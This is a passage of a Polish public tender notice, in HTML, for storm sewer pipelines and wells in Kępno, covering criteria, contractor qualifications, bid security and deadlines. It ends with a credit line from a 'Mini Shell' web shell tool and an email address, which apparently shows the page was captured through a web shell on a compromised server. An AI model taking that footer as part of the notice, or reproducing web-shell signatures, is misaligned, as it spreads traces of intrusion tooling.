Zakres robót obejmuje:a)Roboty ziemne wraz z umocnieniem wykopów,b)	Wykonanie podsypki, obsypki i zasypki rurociągów,c)	Wykonanie rurociągów, w tym:	z rur typu PVC-U, łączonych na wcisk, Fi 315 mm: ok. 9,80m	z rur typu PVC-U, łączonych na wcisk, Fi 500 mm: ok. 461,400m	z rur typu PVC-U, łączonych na wcisk, Fi 800 mm: ok. 115,00md)	Wykonanie studni rewizyjnych ∅1000, ∅1500, ∅1500 z osadnikiem i ∅2000 z pokrywą żeliwno-betonową typu ciężkiego D400,e)Wykonanie rowu krytego,f)	Wykonanie wylotu kanalizacji deszczowej,g)Montaż zasuwy burzowej,h)	Wykonanie rowu odwodnieniowego (odparowującego),i)Próba szczelności przewodów.Zamówieniem objęte są również:- wykonanie i uzyskanie zatwierdzenia projektu organizacji ruchu na czas prowadzenia prac oraz jego realizacji,- uzyskanie zezwoleń na zajęcie pasa drogowego od zarządców dróg i związane z nimi opłaty,- wykonanie wszelkich robót i czynności związanych z prawidłową realizacją zamówienia, nawet w przypadku, gdy nie zostały one ujęte przetargowym przedmiarze robót,<br/>- pełna obsługa geodezyjna budowy: wytyczenie, ewentualne wskazanie granic,- wszelkie naprawy urządzeń nad i podziemnych uszkodzonych podczas wykonywania robót,- przeprowadzenie wszelkich robót i czynności związanych z odbiorem przedmiotu zamówienia i przekazaniem go do eksploatacji, itp.- zabezpieczenie bezpieczeństwa na placu budowy i wokół niego oraz ubezpieczenie budowy,- zatrudnienie kierownika budowy,- powiadomienie odpowiednich organów (w tym instytucji dokonujących uzgodnień dokumentacji projektowej) o przystąpieniu do robót,- inne czynności wynikające z przepisów branżowych bądź specyfiki zamówieniaWykonawca zamówienia winien przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę zamówienia.<br/>UWAGA: Ze względu na ciężkie warunki hydrogeologiczne terenu zalecane jest wcześniejsze zapoznanie przez Wykonawcę się z terenem, na którym będą realizowane roboty stanowiące przedmiot niniejszego zamówienia oraz elementami uzbrojenia podziemnego i nadziemnego na terenie realizacji robót i jego sąsiedztwie, obiektami funkcjonującymi na terenie prowadzanej inwestycji. Wykonawca nie będzie mógł żądać dodatkowego wynagrodzenia z tytułu nieuwzględnienia okoliczności w/w, a okoliczności te nie będą mogły stanowić także wystarczającego powodu dla Wykonawcy, aby nie mógł rozpocząć robót w wyznaczonym terminie.Zamawiający rekomenduje szczegółowe przeanalizowanie dokumentacji geologicznej.Szczegółowy opis przedmiotu zamówienia oraz zakres zadania został określony w umowie, dokumentacji technicznej, przedmiarach robót a także specyfikacji technicznej wykonania i odbioru robót, które stanowią załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233150-5 - Roboty w zakresie regulacji ruchu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">oferty oceniane będą zgodnie z zapisami rozdziału 21 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: zdolności technicznej lub zawodowej<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie:<br/>- co najmniej 2 roboty budowlane zakończone i oddane do eksploatacji, polegające na budowie i/lub przebudowie i/lub rozbudowie sieci kanalizacji sanitarnej grawitacyjno - ciśnieniowej o łącznej długości minimum 1000 m każda, <br/>- co najmniej 1 robotę budowlaną, zakończoną i oddaną do eksploatacji, polegającą na budowie/ rozbudowie / przebudowie sieci wodociągowej o łącznej długości min. 1000 m, <br/>- co najmniej 1 robotę budowlaną, zakończoną i oddaną do eksploatacji, polegającą na budowie/rozbudowie/przebudowie sieci kanalizacji deszczowej o łącznej długości min. 300 m,<br/>- co najmniej jedna z wykazanych robót budowalnych musi obejmować wykonanie sieci kanalizacji sanitarnej grawitacyjnej lub sieci wodociągowej metodą bezwykopową z wykorzystaniem technologii przewiertu sterowanego o łącznej długości przewiertu min. 600 m,<br/><br/>b)	Warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować: - co najmniej 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia, tj. pełnić funkcję Kierownika Budowy, posiadającą ważne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie: kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. Osoba ta musi wykazać się nadzorowaniem lub kierowaniem robotami na:<br/>- co najmniej 1 prawidłowo zakończonym i oddanym do użytku, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, zadaniu polegającym na budowie i/lub przebudowie i/lub rozbudowie sieci kanalizacji sanitarnej grawitacyjno - ciśnieniowej o łącznej długości minimum 1000 m, <br/>- co najmniej 1 prawidłowo zakończonym i oddanym do użytku, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, zadaniu polegającym na budowie i/lub przebudowie i/lub rozbudowie sieci wodociągowej o łącznej długości min. 1000 m <br/>- w tym co najmniej jedna z wykazanych robót budowalnych musi obejmować wykonanie sieci kanalizacji sanitarnej grawitacyjnej lub sieci wodociągowej metodą bezwykopową z wykorzystaniem technologii przewiertu sterowanego o łącznej długości przewiertu min. 600 m<br/><br/>Przez ważne uprawnienia do pełnienia samodzielnych funkcji technicznych <br/>w budownictwie w zakresie kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, należy rozumieć uprawnienia wynikające z art. 36 ust. 1 pkt 1 - 4 oraz art. 42 ust. 2 i 3 ustawy z dnia 07 lipca 1994 r. - Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze zm.) lub równoważne odpowiadające im uprawnienia budowlane do kierowania robotami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia funkcji Kierownika budowy w zakresie budowy sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych.<br/>Wykonawca w celu wykazania spełniania w/w warunku może wskazać osoby będące obywatelem państwa członkowskiego UE, która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznaczne wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej - zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r. poz. 1117).<br/>Wskazane powyżej osoby muszą posiadać biegłą znajomość języka polskiego. W przypadku, gdy wskazane osoby nie posiadają biegłej znajomości języka polskiego Wykonawca jest zobowiązany zapewnić tłumacza(y) języka polskiego, zapewniającego stałe, biegłe i fachowe tłumaczenie w kontaktach między Zamawiającym a Wykonawcą, na okres i dla potrzeb realizacji umowy.<br/><br/>c)	Warunek ten w zakresie posiadania potencjału technicznego niezbędnego do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować minimum 3 zestawami igłofiltrowymi do odwodnień (tj. Kolektor ssący, igłofiltry, agregat pompowy)<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: sytuacji ekonomicznej i finansowej<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a)	posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 5 000 000,00 zł <br/>b)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 5 000 000,00 zł. <br/>W przypadku wykonawców, którzy wykażą kwotę posiadanych środków finansowych lub zdolność kredytową w innej walucie niż PLN, zamawiający przeliczy ich wartość według średniego kursu NBP z dnia wystawienia informacji potwierdzającej wysokość posiadanych środków lub zdolność kredytową.<br/>Warunek ten winien być spełniony samodzielnie przez Wykonawcę, lub przez inny podmiot udostępniający wykonawcy swoją wiedzę i doświadczenie, i który zrealizuje te usługi. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu:odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 10 pkt 4 Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: <br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu:<br/>załącznik nr 5 - wykaz robót budowlanych<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>załącznik nr 6 - wykaz osób<br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami<br/>załącznik nr 7 - wykaz narzędzi<br/>wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami<br/>- informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem<br/>- dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 15.1.	Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 100 000.00 PLN (słownie: sto tysięcy 00/100 PLN).<br/>15.2.	Wadium musi zostać wniesione przed upływem terminu składania ofert, tj. do dnia 22.02.2022 roku do godz. 9:00, według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020r. poz. 299).<br/>15.3.	Wadium musi obejmować pełen okres związania ofertą tj. do dnia 2022-03-23.<br/>15.4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Santander Bank Polska S.A. 65 1090 1144 0000 0000 1400 3711 (w tytule przelewu zaleca się wpisać nazwę i sygnaturę postępowania). Wadium musi wpłynąć na wskazany rachunek bankowy najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>15.5.	Wadium wnoszone w formie poręczeń lub gwarancji należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji oraz powinno zawierać:<br/>a)	wskazanie Beneficjenta poręczenia lub gwarancji, którym musi być Wydział Rozwoju, Ratuszowa 1 , 63-600 Kępno;<br/>b)	nazwę i adres siedziby Wykonawcy;<br/>c)	kwotę i termin ważności gwarancji/poręczenia;<br/>d)	bezwarunkowe zobowiązanie wystawcy poręczenia lub gwarancji do zapłaty kwoty wadium, na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>15.6.	Zamawiający zwróci wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp. <br/>15.7.	W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>15.8.	Zamawiający zatrzyma wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, wystąpi odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, w przypadkach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 12.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>12.2.	Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1)	postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>12.3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, o którym mowa w pkt. 9.1 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1.	Zamawiający udzieli Wykonawcy jednej zaliczki na poczet wykonania zamówienia, w wysokości 5% wynagrodzenia brutto wykonawcy, o którym mowa w § 10 ust. 1.<br/>2.	Wykonawca nie później niż w terminie 14 dni od dnia zawarcia umowy złoży do Zamawiającego wniosek o udzielenie zaliczki na poczet wykonania zamówienia, do którego Wykonawca załączy projekt zabezpieczenia zwrotu zaliczki w formie, o której mowa w ust. 4. Wykonawca we wniosku o udzielenie zaliczki wskaże numer rachunku bankowego, na który ma zostać wpłacona zaliczka. Numer rachunku bankowego musi być taki sam jak wskazany wcześniej w umowie do wypłaty wynagrodzenia wykonawcy. Ewentualny zwrot zaliczki następuje także na ten numer rachunku bankowego.<br/>3.	Zamawiający rozpatrzy wniosek o wypłatę zaliczki w ciągu 5 dni roboczych od jego otrzymania. Wyrażenie przez Zamawiającego zgody na wypłatę zaliczki będzie dla Wykonawcy podstawą do wystawienia faktury na zaliczkę. <br/>4.	Zamawiający wymaga, aby Wykonawca wniósł zabezpieczenie zaliczki w jednej lub kilku niżej wymienionych formach:<br/>1)	Gwarancjach bankowych,<br/>2)	Gwarancjach ubezpieczeniowych,<br/>3)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości,<br/>5)	przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu terytorialnego. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określa załącznik nr 4 do SWZ - umowa <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-ProPublico.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-22 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com